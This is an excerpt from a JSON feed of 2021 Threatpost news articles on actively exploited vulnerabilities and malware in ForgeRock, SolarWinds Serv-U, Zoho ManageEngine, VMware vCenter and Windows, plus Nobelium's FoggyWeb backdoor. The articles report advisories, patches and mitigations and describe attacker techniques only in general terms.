wrote. \u201cIt appeared to me as a monstrous Java Enterprise application with a huge attack surface, so I decided to take a deeper look into it.\u201d\n\nHis takeaways from tackling the Java monster:\n\n * Source code analysis and local testing are essential for finding issues like this one.\n * URLDNS and JRMPClient gadget chains are the most universal for testing deserialization in Java.\n * Even in solutions designed for authentication, you can find a big attack surface available without any auth.\n * Automatic source code analysis tools are not sufficient if they don\u2019t cover dependencies.\n * Java deserialization rocks.\n\n## Patch Available\n\nOn Saturday, ForgeRock [updated its advisory](<https://www.forgerock.com/blog/patch-fixing-am-vulnerability-now-available-forgerock-am-6x>) to advise users to take immediate action to either implement one of the workarounds or the patch as soon as possible.\n\nForgeRock urged users to apply a workaround, to be applied \u201cimmediately\u201d to secure deployments, noting that the workarounds are suitable for all versions, including older, unsupported ones.\n\nStepankin noted that the vulnerability was patched in ForgeRock AM version 7.0 \u201cby entirely removing the \u2018/ccvesion\u2019 endpoint, along with other legacy endpoints that use Jato.\u201d\n\nHe mentioned this big \u201cbut\u201d: \u201cJato framework has not been updated for many years, so all other products that rely on it may still be affected.\u201d\n\nThe researcher also noted that the flaw doesn\u2019t affect instances running with Java version 9 or newer, \u201csince Jato requires classes that have been removed in Java 9. It\u2019s [one of the reasons](<https://backstage.forgerock.com/knowledge/kb/article/a53786484>) why ForgeRock AM versions prior 7, such as 6.5, are still running on Java 8,\u201d he continued.\n\n## Patch or Workaround\n\nUsers who can\u2019t patch can apply one of two [workarounds](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) that ForgeRock provided in its advisory.\n\nCISA recommends these steps for Access Management users to secure their platforms against the active, ongoing exploits:\n\n * Review the [ForgeRock Security Advisory](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) and the [Australian Cyber Security Centre Alert](<https://www.cyber.gov.au/acsc/view-all-content/alerts/forgerock-open-am-critical-vulnerability>);\n * Check for vulnerable instances of the Access Management software (see [ForgeRock\u2019s Technical Impact Assessment](<https://backstage.forgerock.com/cloud-storage-ws/api/v1/cloudstorage/getfile/oEQfKvz8SWSCaq8F2bfwhw>)); and\n * Prioritize deploying an update to Access Management version 7 or apply the workaround urgently.\n\n## Tasty Targets\n\nMarcus Hartwig, manager of security analytics at cybersecurity firm Vectra, told Threatpost on Monday that identity and access management (IAM) platforms like OpenAM are \u201calways ripe targets for attackers since they allow attackers to access multiple downstream applications federated with the solution.\u201d\n\nAs well, Hartwig said in an email, \u201ceven if the compromised account lacks access to a specific application, many IAM solutions support creating new downstream accounts on applications through protocols like SCIM, which further allows attackers to progress their attacks.\u201d\n\nHe said that it\u2019s \u201cparamount\u201d for organizations that leverage IAM solutions for SSO into downstream applications to \u201cmonitor account behavior in their environs to detect attacks that circumvent the preventative security that Access Management solutions focus on.\u201d\n\n071221 16:19 UPDATE: Corrected the article to specify that there\u2019s a patch available. We regret the error.\n\n071221 20:21 UPDATE: Corrected inaccurate timeline for patch release.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-12T18:01:46", "type": "threatpost", "title": "Critical RCE Vulnerability in ForgeRock OpenAM Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-12T18:01:46", "id": "THREATPOST:50745DFE98A2EA07C8BE5D2F2CFA940F", "href": "https://threatpost.com/critical-vulnerability-rce-forgerock-openam/167679/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-13T13:05:06", "description": "SolarWinds has issued a hotfix for a zero-day remote code execution (RCE) vulnerability already under active, yet limited, attack on some of the company\u2019s customers.\n\nMicrosoft alerted the company about the flaw, which affects its [Serv-U Managed File Transfer Server](<https://www.solarwinds.com/serv-u-managed-file-transfer-server>) and [Serv-U Secured FTP](<https://www.solarwinds.com/ftp-server-software>) products. Specifically, the vulnerability exists in the latest Serv-U version 15.2.3 HF1 released on May 5 of this year, as well as all prior versions, the company said in a [security advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) posted over the weekend.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft provided a proof-of-concept (PoC) exploit to SolarWinds, demonstrating how a threat actor who successfully exploits the vulnerability could run arbitrary code with privileges, according to the advisory.\n\n\u201cAn attacker could then install programs; view, change or delete data; or run programs on the affected system,\u201d the computing giant said.\n\nThough the current threat appears to be from a sole actor and \u201cinvolves a limited, targeted set of customers,\u201d SolarWinds wanted to remedy the situation before it could escalate, the company said. \u201cOur joint teams have mobilized to address it quickly,\u201d according to the advisory.\n\nSolarWinds does not currently know many customers may be directly affected by the flaw, nor has it identified the ones who were targeted. The company is recommending that all customers using the affected products update now, which can be done by accessing the company\u2019s [customer portal](<https://customerportal.solarwinds.com/>).\n\n## Unrelated to Supply-Chain Attack\n\nIndeed, SolarWinds likely still has fresh memories of a [global supply-chain attack](<https://threatpost.com/solarwinds-attackers-dhs-emails/165110/>) targeting the company\u2019s technology that was discovered late last year and stretched well into 2021. That attack occurred when [a state-sponsored APT](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>) injected malicious code into normal software updates for SolarWinds Orion network-management platform.\n\nSpecifically, attackers installed the Sunburst/Solorigate backdoor inside SolarWinds.Orion.Core.BusinessLayer.dll, a SolarWinds digitally signed component of Orion. From there, the threat actors mounted a [massive cyberespionage campaign](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that hit nine U.S. government agencies, Microsoft and other tech companies, as well as about 100 other victims.\n\nSolarWinds stressed in its advisory that the latest vulnerability is not related to that [previous scenario](<https://threatpost.com/solarwinds-hack-seismic-shift/165758/>) \u2014 which [cost the company $3.5 million](<https://d18rn0p25nwr6d.cloudfront.net/CIK-0001739942/48bd02f7-3c52-4abc-a5e9-60401f9a4e8b.pdf>) in investigation and remediation expenses \u2014 in any way.\n\n\u201cAll other SolarWinds and N-able (formerly SolarWinds MSP) are not affected** **by this vulnerability,\u201d the company wrote. \u201cThis includes the Orion Platform, and all Orion Platform modules.\u201d\n\nIn fact, the company even included a complete list of products \u201cnot known to be affected by this security vulnerability\u201d in the advisory for good measure, perhaps to stave off any potential panic or doubt that news of the latest vulnerability might inspire.\n\nIndeed, one security expert took to Twitter to advise organizations to keep a cool head over the news and take preemptive measures rather than raise an immediate alarm.\n\n\u201cI know there\u2019s a tendency to panic because it\u2019s SolarWinds \u2026 but I\u2019d suggest avoiding panic and taking proactive actions for defense and response instead,\u201d [tweeted](<https://twitter.com/likethecoins/status/1414681417053835265>) Katie Nickels, director of intel at security operations firm Red Canary.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-13T12:58:11", "type": "threatpost", "title": "SolarWinds Issues Hotfix for Zero-Day Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T12:58:11", "id": "THREATPOST:529C328386588625C56031DEF4AB5D63", "href": "https://threatpost.com/solarwinds-hotfix-zero-day-active-attack/167704/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-16T21:32:23", "description": "The FBI, CISA and the U.S. Coast Guard Cyber Command (CGCYBER) warned today that state-backed advanced persistent threat (APT) actors are likely among those who\u2019ve been actively exploiting a newly identified bug in a Zoho single sign-on and password management tool since early last month.\n\nAt issue is a critical authentication bypass vulnerability in Zoho ManageEngine ADSelfService Plus platform that can lead to remote code execution (RCE) and thus open the corporate doors to attackers who can run amok, with free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nThe Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) platform for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nLast Tuesday, [Zoho issued a patch](<http://cve-2021-40539>) \u2013 [Zoho ManageEngine ADSelfService Plus build 6114](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>) \u2013 for the flaw, which is tracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) with a 9.8 severity rating. As the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) at the time, it was being actively exploited in the wild as a zero-day.\n\nAccording to today\u2019s [joint advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) from the three government cybersecurity arms \u2013 FBI, CISA and CGCYBER \u2013 the exploits pose \u201ca serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software.\u201d\n\nYou can see why: Successful exploitation of a lynchpin piece of security like a SSO and password handler could lay out a welcome mat for adversaries. Specifically, as the advisory iterated, an adversary could use the vulnerability to pry open security defenses in order to compromise admin credentials, move laterally through the network, and exfiltrate registry hives and AD files.\n\nThat\u2019s of concern to any business, but with Zoho, we\u2019re talking about a security solution that\u2019s used by critical infrastructure companies, U.S.-cleared defense contractors and academic institutions, among others.\n\nThe joint advisory said that APT groups have in fact targeted such entities in multiple industries, including transportation, IT, manufacturing, communications, logistics and finance.\n\n\u201cIllicitly obtained access and information may disrupt company operations and subvert U.S. research in multiple sectors,\u201d the advisory noted. \u201cSuccessful exploitation of the vulnerability allows an attacker to place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\u201d\n\n## Confirming Exploits May Be Tough\n\nSuccessful attacks have been uploading a .zip file containing a JavaServer Pages (JSP) webshell \u2013 accessible at /help/admin-guide/Reports/ReportGenerate.jsp \u2013 pretending to be an x509 certificate, service.cer. Next come requests to different API endpoints to further exploit the targeted system.\n\nThe next step in the exploit is lateral movement using Windows Management Instrumentation (WMI), gaining access to a domain controller, dumping of NTDS.dit and SECURITY/SYSTEM registry hives, and then, from there, further compromised access.\n\n\u201cConfirming a successful compromise of ManageEngine ADSelfService Plus may be difficult,\u201d the security agencies advised, given that the attackers are running clean-up scripts designed to rub out their tracks by removing traces of the initial point of compromise and by obscuring any relationship between the exploitation of CVE-2021-40539 and the webshell.\n\nThe advisory provided this laundry list of tactics, techniques and processes (TTP) being used by threat actors to exploit the vulnerability:\n\n * WMI for lateral movement and remote code execution (wmic.exe)\n * Using plaintext credentials acquired from compromised ADSelfService Plus host\n * Using pg_dump.exe to dump ManageEngine databases\n * Dumping NTDS.dit and SECURITY/SYSTEM/NTUSER registry hives\n * Exfiltration through webshells\n * Post-exploitation activity conducted with compromised U.S. infrastructure\n * Deleting specific, filtered log lines\n\n## Mitigations\n\nOrganizations that detect indicators of compromise (IoC) around their ManageEngine ADSelfService Plus installations \u201cshould take action immediately,\u201d the trio of agencies instructed.\n\n\u201cFBI, CISA, and CGCYBER strongly urge users and administrators to update to ADSelfService Plus build 6114,\u201d the trio stated. They also strongly urged organizations to keep ADSelfService Plus away from direct access via the internet.\n\nThey\u2019re also strongly recommending domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets \u201cif any indication is found that the NTDS.dit file was compromised.\u201d\n\n## This One Will Hurt\n\nJake Williams, co-founder and CTO at incident response firm BreachQuest, said that organizations should take note of the fact that threat actors have been using webshells as a post-exploitation payload. In the case of the exploitation of this Zoho flaw, they\u2019re using webshells disguised as certificates: something that security teams should be able to pick up on in web server logs, but \u201conly if organizations have a plan for detection.\u201d\n\nNo time like the present to start, he told Threatpost on Thursday: \u201cGiven that this will certainly not be the last vulnerability that results in web shell deployment, organizations are advised to baseline normal behavior in their web server logs so they can quickly discover when a web shell has been deployed.\u201d\n\nFinding a critical vulnerability in the system intended to help your employees manage and reset their passwords is \u201cexactly as bad as it sounds,\u201d noted Oliver Tavakoli, CTO at cybersecurity firm Vectra. \u201cEven if the ADSelfService Plus server was not accessible from the internet, it would be accessible from any compromised laptop. Recovery will be expensive \u2013 \u2018domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets\u2019 are certainly disruptive by themselves, and the APT groups may have established other means of persistence in the intervening time.\u201d\n\nThis ManageEngine vulnerability is the fifth instance of similarly critical vulnerabilities from ManageEngine this year, noted Sean Nikkel, senior cyber threat intel analyst at digital risk protection provider Digital Shadows. Unfortunately but predictably, given how much access attackers can get out of exploiting a vulnerability like this, we can likely expert more widespread exploitation of this and previous bugs, \u201cgiven the interactivity with Microsoft system processes.\u201d\n\nNikkel continued with yet another gloomy prediction: \u201cThe observation that APT groups are actively exploiting CVE-2021-40539 should highlight the potential exposure it might cause. If trends are consistent, extortion groups will likely seek exploitation for ransomware activity in the not-so-distant future,\u201d he mused.\n\nAll of which points to what CISA et al. have been urging about these vulnerabilities: namely, patch fast. \u201cUsers of Zoho\u2019s software should apply patches immediately to avoid the types of compromise described in the CISA bulletin,\u201d Nikkel said.\n\n## See Something, Say Something\n\nOrganizations should immediately report any of the following to [CISA](<https://us-cert.cisa.gov/report>) or the FBI:\n\n * Identification of IoC as outlined in the advisory.\n * Presence of webshell code on compromised ManageEngine ADSelfService Plus servers.\n * Unauthorized access to or use of accounts.\n * Evidence of lateral movement by malicious actors with access to compromised systems.\n * Other indicators of unauthorized access or compromise.\n\nHere are the reporting instructions:\n\n * Contact your local FBI field office at <https://www.fbi.gov/contact-us/field-offices>, or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, include the incident date, time and location; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n * To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.gov.\n * To report cyber incidents to the Coast Guard contact the USCG National Response Center (NRC). Phone: 1-800-424-8802, email: NRC@uscg.mil.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-16T21:09:23", "type": "threatpost", "title": "CISA, FBI: State-Backed APTs Are Exploiting Critical Zoho Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-16T21:09:23", "id": "THREATPOST:1606F3DA3AAD368249E36D32FC2B8079", "href": "https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-22T16:20:45", "description": "VMware has released a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that includes patches for 19 CVE-numbered vulnerabilities that affect the company\u2019s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.\n\nThey\u2019re all serious, but one \u2013 CVE-2021-22005, a critical arbitrary file upload vulnerability in the Analytics service that\u2019s been assigned the maximum CVSSv3 base score of 9.8 \u2013 is uber nasty.\n\n\u201cThis vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,\u201d [said Bob Plankers](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>), Technical Marketing Architect at VMware.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe time to act is yesterday, Plankers wrote:\n\n> \u201cIn this era of ransomware it is safest to assume that an attacker is already inside your network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible.\u201d \u2014Bob Planker, [VMware vSphere blog](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)\n\nThe security update addresses flaws in vCenter Server 6.5, 6.7, and 7.0.\n\n## When to Act?\n\nThe time to act is \u201cRight now,\u201d Plankers said. \u201cThese updates fix a critical security vulnerability, and your response needs to be considered at once.\u201d\n\nCVE-2021-22005 can be used to execute commands and executables on the vCenter Server Appliance. The company didn\u2019t tiptoe around the need for urgent action: Users should patch this vulnerability \u201cimmediately,\u201d VMware said in its [FAQ for VMSA-2021-0020](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>). The bug could have nasty repercussions, with exploits likely being hammered out \u201cminutes after the disclosure,\u201d it said:\n\n> \u201cThe ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\u201d [\u2014VMware FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>)\n\n## Assume That Attackers Are Already In Your System\n\nThis is a ransomware-friendly bug. VMware pointed to the [all-too-real threat](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>) of spiraling ransomware attacks: a growing risk that makes the \u201csafest stance\u201d the assumption that threat actors have already seized control of a desktop and a user account via [phishing](<https://threatpost.com/hackers-deep-sea-phishing/174868/>) or [spearphishing](<https://threatpost.com/linkedin-spear-phishing-job-hunters/165240/>) attacks, it said.\n\nIf a phishing attack has compromised an account(s), it means that the attacker \u201cmay already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence,\u201d VMware stressed.\n\nThis patch is considered an \u201cemergency change\u201d for organizations that practice change management using the [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types, the company said. An emergency change is one that must be introduced ASAP: for example, to resolve a major incident or implement a security patch.\n\nGranted, the decision on how to proceed is up to individual organizations, all of which have different environments, tolerance for risk, security controls and risk mitigation strategies. \u201cThe decision on how to proceed is up to you,\u201d VMware said, but still, given the severity, the company strongly recommends that users act.\n\n## The Other 18 Flaws Are Still Attacker Candy\n\nThe other security issues addressed in Tuesday\u2019s update have lower CVSS scores, but they\u2019re still ripe for the plucking by any attacker that\u2019s already compromised organizations\u2019 networks. That\u2019s one of the \u201cbiggest problems facing IT today,\u201d Plankers wrote: the fact that cyberattackers can persist on a compromised network, \u201cpatiently and quietly\u201d biding their time to eventually move laterally as they use compromised accounts to break into other systems over long periods of time.\n\n\u201cThey steal confidential data, intellectual property, and at the end install ransomware and extort payments from their victims,\u201d Plankers explained. \u201cLess urgent security vulnerabilities can still be potential tools in the hands of attackers, so VMware always recommends patching to remove them.\u201d\n\n## How to CYA (Cover Your Assets)?\n\nIf possible, the quickest way to resolve these serious issues is to patch vCenter Server. If that\u2019s not possible, VMware has workarounds, but only for the critical vulnerability, CVE-2021-22005. The workaround is listed in the [response matrix](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) at the bottom of VMware\u2019s VMware Security Advisory (VMSA), VMSA-2021-0020.\n\nThe workaround involves editing a text file on the VCSA and restarting services.\n\nStill, if possible, patching should be the first choice for a few reasons, Plankers advised:\n\n> First, if you can patch vCenter Server, do it. In general, this is the fastest way to resolve this problem, doesn\u2019t involve editing files on the vCenter Server Appliance (VCSA), and removes the vulnerabilities completely. Patching also carries less technical debt and less risk than using a workaround. \u2014Bob Plankers\n\nOther security controls that can help to protect users\u2019 networks until they can patch include using network perimeter access controls or the vCenter Server Appliance firewall to curtail access to the vCenter Server management interfaces. \u201cWe always strongly suggest limiting access to vCenter Server, ESXi, and vSphere management interfaces to only vSphere Admins,\u201d Plankers said. \u201cDrive all other workload management activity through the VM network connections. This simplifies access control and makes the RDP or ssh management traffic subject to other security controls, such as IDS/IPS and monitoring.\u201d\n\n## More Resources\n\nVMware offered this list of resources:\n\n * [Tips for Patching VMware vSphere](<https://core.vmware.com/tips-patching-vmware-vsphere>) (practical advice for ensuring patching success)\n * [VMware vSphere Security Configuration Guide](<https://core.vmware.com/security-configuration-guide>) (baseline security best practices for vSphere)\n * [VMware Ransomware Resource Center](<https://core.vmware.com/ransomware>) (discussion around tactics to help prevent, deter, and recover from attacks)\n * [VMware Ports & Protocols Firewalling Guidance](<https://ports.vmware.com/>) (ports.vmware.com)\n * [VMware Security Advisory VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) (descriptions of the issues and workarounds)\n * [VMware Communities Forum Thread on VMSA-2021-0020](<https://via.vmw.com/vmsa-2021-0020-community>) (a great place to ask questions)\n * [VMSA-2021-0020: Questions & Answers](<https://via.vmw.com/vmsa-2021-0020-faq>) (questions VMware has received about this issue)\n * [VMSA-2021-0020: What You Need to Know](<https://via.vmw.com/vmsa-2021-0020-blog>) (Plankers\u2019 blog post)\n\n## Can\u2019t Patch What You Don\u2019t Know Is There\n\nGreg Fitzgerald, co-founder of the cybersecurity firm Sevco Security, noted that vulnerabilities such as this one point to the need to go far beyond patching this vCenter bug. \u201cIt\u2019s critical for enterprises to take the first step of patching this vCenter vulnerability, but it can\u2019t stop there,\u201d he told Threatpost on Wednesday.\n\nBeyond patching the initial vulnerability ASAP, enterprises would be well-advised to know what IT assets they have. Even the most fastidious approach to patch management \u201ccannot ensure that all enterprise assets are accounted for,\u201d he said via email. \u201cYou can\u2019t patch something if you don\u2019t know it\u2019s there, and attackers have figured out that the easiest path to accessing your network and your data is often through unknown or abandoned IT assets.\u201d\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-22T16:17:33", "type": "threatpost", "title": "VMware Warns of Ransomware-Friendly Bug in vCenter Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T16:17:33", "id": "THREATPOST:14DD6B793DC77F25538436F7D14C922B", "href": "https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-22T20:05:59", "description": "A privilege escalation bug, affecting versions of Windows 10, received a workaround fix by Microsoft Wednesday to prevent attackers from accessing data and creating new accounts on compromised systems.\n\nThe bug, dubbed SeriousSAM, affects the Security Accounts Manager (SAM) database in all versions of Windows 10. The SAM component in Windows houses user account credentials and network domain information \u2013 a juicy target for attackers. A prerequisite for abuse of the bug is an adversary needs either remote or local access to the vulnerable Windows 10 system.\n\nTracked as CVE-2021-36934, Microsoft said the vulnerability exists because of overly permissive Access Control Lists on multiple system files, including the (SAM) database. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\u201d the [Microsoft bulletin explains](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>). \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)Simply stated, an attacker could leverage the bug to gain access to the SAM database of hashed credentials, which then could be decrypted offline and used to bypass Windows 10 user access controls.\n\n## Proof-of-Concept Available\n\nThe bug is rated important in severity by Microsoft. The flaw was revealed to Microsoft by researchers Jonas Lyk over the weekend and made public Monday. [Proof-of-concept code](<https://github.com/GossiTheDog/HiveNightmare>) was published by researcher Kevin Beaumont to help network admins identify exposure to the bug.\n\nIn a Tweet by Lyk, the researcher said the bug also impacts pre-production versions of Windows 11 (slated to be released in October, 2021). \u201cFor some reason on win11 the SAM file now is READ for users. So if you have shadowvolumes enabled you can read the sam file,\u201d [he tweeted](<https://twitter.com/jonasLyk/status/1417205166172950531>).\n\nThe researcher said the bug was discovered while tinkering with Windows 11. He explains that SAM database content, while not accessible on the OS, can be accessed when part of a Windows Shadow Volume Copy (VSS) backup. VSS is a service that allows automatic or manual real-time backups of system files (preserved in their current state) tied to a particular drive letter (volume).\n\nHe later identified the same issue is present on Windows 10 systems dating back to 2018 (v1809).\n\n## **No Patch Available: Workaround Fix Recommended**\n\nFor this reason, Microsoft is recommending sysadmin delete the backup copies of the VSS files. The OS maker does not offer a patch for the bug, rather a simple workaround.\n\nMicrosoft explains the two step process as: \u201cDelete any System Restore points and Shadow volumes that existed prior to restricting access to %windir%\\system32\\config\u201d and \u201ccreate a new System Restore point (if desired).\u201d\n\nIt also cautions that deleting VSS shadow copies \u201ccould impact restore operations, including the ability to restore data with third-party backup applications.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-22T12:57:11", "type": "threatpost", "title": "Microsoft Issues Windows 10 Workaround Fix for \u2018SeriousSAM\u2019 Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-22T12:57:11", "id": "THREATPOST:B0D084253CDDA9B0416ADB6DC22BEC9B", "href": "https://threatpost.com/win-10-serioussam/168034/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-29T14:13:43", "description": "The threat actors behind the notorious SolarWinds supply-chain attacks have dispatched new malware to steal data and maintain persistence on victims\u2019 networks, researchers have found.\n\nResearchers from the Microsoft Threat Intelligence Center (MSTIC) have observed the APT it calls Nobelium using a post-exploitation backdoor dubbed FoggyWeb, to attack Active Directory Federation Services (AD FS) servers. AD FS enables single sign-on (SSO) across cloud-based apps in a Microsoft environment, by sharing digital identity and entitlements rights.\n\nThe attacks started as far back as April, Ramin Nafisi from MSTIC wrote in a [blog post](<https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/>) published Monday.\n\nNobelium is employing \u201cmultiple tactics to pursue credential theft\u201d to gain admin privileges to AD FS servers, Nafisi wrote. Then, once a server is compromised, the threat group deploys FoggyWeb \u201cto remotely exfiltrate the configuration database of compromised AD FS servers, decrypted [token-signing certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/token-signing-certificates>) and [token-decryption certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/certificate-requirements-for-federation-servers>),\u201d he said, which can be used to penetrate into users\u2019 cloud accounts.\n\nIn addition to remotely exfiltrating sensitive data, FoggyWeb also achieves persistence and communicates with a a command-and-control (C2) server to receive additional malicious components and execute them, Nafisi added.\n\n## **Backdoor Breakdown**\n\nNafisi provides a thorough breakdown of the sophisticated FoggyWeb backdoor, which operates by allowing abuse of the Security Assertion Markup Language (SAML) token in AD FS, he explained in the post.\n\n\u201cThe backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target\u2019s AD FS deployment,\u201d Nafisi wrote. \u201cThe custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor.\u201d\n\nAttackers store the malware in an encrypted file called _Windows.Data.TimeZones.zh-PH.pri_, while the malicious file _version.dll_ acts as a loader. The DLL file leverages the CLR hosting interfaces and APIs to load FoggyWeb, a managed DLL, in the same Application Domain within which legitimate AD FS managed code is executed.\n\nIn this way, FoggyWeb gains access to the AD FS codebase and resources, including the AD FS configuration database. The malware also inherits AD FS service account permissions that are required to access the AD FS configuration database, Nafisis wrote.\n\nAdditionally, \u201cbecause FoggyWeb is loaded into the same application domain as the AD FS managed code, it gains programmatical access to the legitimate AD FS classes, methods, properties, fields, objects and components that are subsequently leveraged by FoggyWeb to facilitate its malicious operations,\u201d he added.\n\nMoreover, FoggyWeb is also AD FS version-agnostic, which means it doesn\u2019t need to keep track of legacy versus modern configuration table names and schemas, named pipe names and other version-dependent properties of AD FS, Nafisi wrote.\n\n## **Malware Mitigation**\n\nMicrosoft has notified all customers observed being targeted or compromised by FoggyWeb, as well as included a comprehensive list of compromise indicators in the post.\n\nThe company also has recommended several mitigation actions for organizations, including: Auditing of on-premises and cloud infrastructure to identify any changes the actor might have made to maintain access; removing user and app access, reviewing configurations for each, and re-issuing new, strong credentials; and using a hardware security module to prevent the exfiltration of sensitive 